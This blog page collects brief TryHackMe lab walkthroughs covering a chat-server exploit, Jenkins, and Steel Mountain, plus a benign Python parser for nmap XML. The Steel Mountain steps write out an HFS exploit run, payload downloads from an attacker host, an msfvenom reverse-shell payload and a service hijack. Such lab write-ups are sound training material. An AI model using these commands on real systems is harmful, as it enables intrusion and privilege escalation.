Reverse engineer a chat program and write a script to exploit a Windows machine.


NMAP Scan:

nmap -sC -sV -Pn -T4 10.10.175.210 --disable-arp -oX chatserver_nmap.xml

  • sC = default script scan
  • sV = version scan
  • Pn = skip host discovery (treat the host as online)
  • T4 = aggressive timing template
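The `-oX` flag in the scan above writes the results as XML, which is the form worth keeping for later comparison rather than the screen output. The following is an added example (not from the original post) that turns such a file into an open-port inventory and flags ports that the `-sV` probe could not fingerprint; the XML it parses is constructed to follow nmap's `-oX` schema and does not come from a scan of the machine on the page.

```python
"""Parse the XML that `nmap -oX` writes into a port/service inventory.

Added example; the XML below is constructed to mimic nmap's schema and is
not a real scan of the target on the page.
"""
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX schema (addresses and banners are made up).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sC -sV -Pn -T4 -oX out.xml 192.0.2.10">
  <host>
    <status state="up" reason="user-set"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="Microsoft ftpd" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="3389">
        <state state="open" reason="syn-ack"/>
        <service name="ms-wbt-server" product="Microsoft Terminal Services" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="9999">
        <state state="open" reason="syn-ack"/>
        <service name="abyss" method="table" conf="3"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="closed" reason="reset"/>
        <service name="http" method="table" conf="3"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text):
    """Return one dict per open port across every host in the run, sorted."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        addr = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports are not part of the inventory
            svc = port.find("service")
            findings.append({
                "host": addr,
                "proto": port.get("protocol"),
                "port": int(port.get("portid")),
                "service": svc.get("name") if svc is not None else None,
                "product": svc.get("product") if svc is not None else None,
                # method="probed" means -sV actually matched a banner;
                # method="table" is only a guess from the port number.
                "fingerprinted": svc is not None and svc.get("method") == "probed",
            })
    findings.sort(key=lambda f: (f["host"], f["proto"], f["port"]))
    return findings


def unidentified_ports(findings):
    """Open ports that -sV could not fingerprint; these need manual inspection
    (on the page, the netcat session against the chat port is that step)."""
    return [f["port"] for f in findings if not f["fingerprinted"]]


if __name__ == "__main__":
    result = parse_nmap_xml(SAMPLE_NMAP_XML)
    for f in result:
        print(f"{f['host']}:{f['port']}/{f['proto']}  {f['service']}  {f['product'] or ''}")
    print("needs manual inspection:", unidentified_ports(result))
```

Running it against a real `chatserver_nmap.xml` is a matter of reading the file into `parse_nmap_xml`; keeping the parsed inventory from each scan makes it easy to diff what is exposed over time, which is the defender's use of the same scan.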

First step is to grab the chatserver.exe and essfunc.dll using ftp from the target machine to your local machine for debugging.


Open Immunity Debugger as Administrator from your local machine then attach chatserver.exe and hit F9 to run the program.


Check how the application behaves using netcat. …


Exploit Jenkins to gain an initial shell, then escalate your privileges by exploiting Windows authentication tokens.

[1]NMAP Scan

sudo nmap -A -T4 10.10.131.184 -oN nmap_alfred


[2]Visit Webpage

http://10.10.131.184:8080


[3]Brute force login page

Capture login traffic using burpsuite:


Utilize PowerShell commands and winPEAS to enumerate the system and collect the relevant information to escalate privilege.


Machine Information:


[1]NMAP Scan

sudo nmap -A -T -p- 10.10.255.1 -oN nmap_scan


[2]Research vulnerability

searchsploit hfs 2.3
searchsploit -x 39161.py


[3]Edit exploit


[4]Setup HTTP server to serve nc.exe and winPEAS

sudo python -m SimpleHTTPServer 80


[5]Setup a netcat listener then run exploit

nc -lvnp 4444

python exploit.py 10.10.255.1 8080


[6]Download winPEAS for Privilege Escalation

powershell -c "Invoke-WebRequest -OutFile winPEAS.exe http://10.11.17.48/winPEAS.exe"


[7]Run winPEAS

winPEAS.exe


[8]Create msfvenom payload and setup a netcat listener

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.17.48 LPORT=1234 -f exe -o ASCService.exe

nc -lvnp 1234


[9]Stop service

sc stop AdvancedSystemCareService9


[10]Download payload under the directory of the target service then start service

powershell -c "Invoke-WebRequest -OutFile ASCService.exe http://10.11.17.48/ASCService.exe"

sc start AdvancedSystemCareService9


References:

https://tryhackme.com/room/steelmountain

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

About

scryptk1ddy

Experienced network security engineer with a demonstrated history of working in the IT security industry.
